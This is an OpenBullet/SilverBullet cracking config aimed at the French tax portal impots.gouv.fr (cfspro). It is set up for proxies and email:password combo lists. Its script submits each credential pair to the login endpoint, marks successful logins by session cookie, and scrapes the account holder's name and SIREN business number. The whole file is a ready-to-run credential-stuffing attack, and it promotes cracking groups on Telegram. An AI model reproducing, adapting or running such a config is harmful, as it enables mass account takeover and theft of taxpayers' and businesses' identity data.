[SETTINGS]
{
  "Name": "impots.gouv.fr",
  "SuggestedBots": 30,
  "MaxCPM": 250,
  "LastModified": "2021-12-05T17:23:47.5010701+01:00",
  "AdditionalInfo": "Join TeamDemon And SilverBulletSoft on TG.",
  "RequiredPlugins": [],
  "Author": "@ChrisLocket",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "MailPass",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "impots.gouv",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
FUNCTION Base64Encode "https://cfspro-idp.impots.gouv.fr//oauth2" -> VAR "oauthB64" 

FUNCTION Base64Encode "http://cfspro.impots.gouv.fr/mire/accueil.do" -> VAR "redirectB64" 

REQUEST GET "https://cfspro.impots.gouv.fr/?url=<redirectB64>" AutoRedirect=FALSE ReadResponseSource=FALSE 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 
  HEADER "Referer: https://cfspart.impots.gouv.fr/" 

REQUEST POST "<HEADERS(Location)>" AutoRedirect=FALSE EncodeContent=TRUE 
  CONTENT "url=<oauthB64>&timezone=&skin=pro&user=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 
  HEADER "Origin: https://cfspro-idp.impots.gouv.fr" 
  HEADER "Referer: <authurl>" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Cat2LMDPAuth" 
  KEYCHAIN Success OR 
    KEY "<COOKIES(lemonldapCFSProIDP)>" MatchesRegex "^0?[xX]?[0-9a-fA-F]*$" 

REQUEST GET "<HEADERS(Location)>" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 
  HEADER "Referer: https://cfspro-idp.impots.gouv.fr/" 

PARSE "<SOURCE>" CSS "#mon_cpte > div > p > strong" "innerHTML" -> VAR "Name" 

FUNCTION Replace "^.{4,8}\\; " "" UseRegex=TRUE "<Name>" -> VAR "Name" 

FUNCTION Replace "&nbsp;" "" "<Name>" -> CAP "Name" 

PARSE "<SOURCE>" REGEX "href=\"\\/mire\\/externRedirect\\.do;jsessionid=(0?[xX]?[0-9a-fA-F]*)\\?siren=(\\d{9})&amp;" "[2]" CreateEmpty=FALSE -> CAP "SIREN Number" 

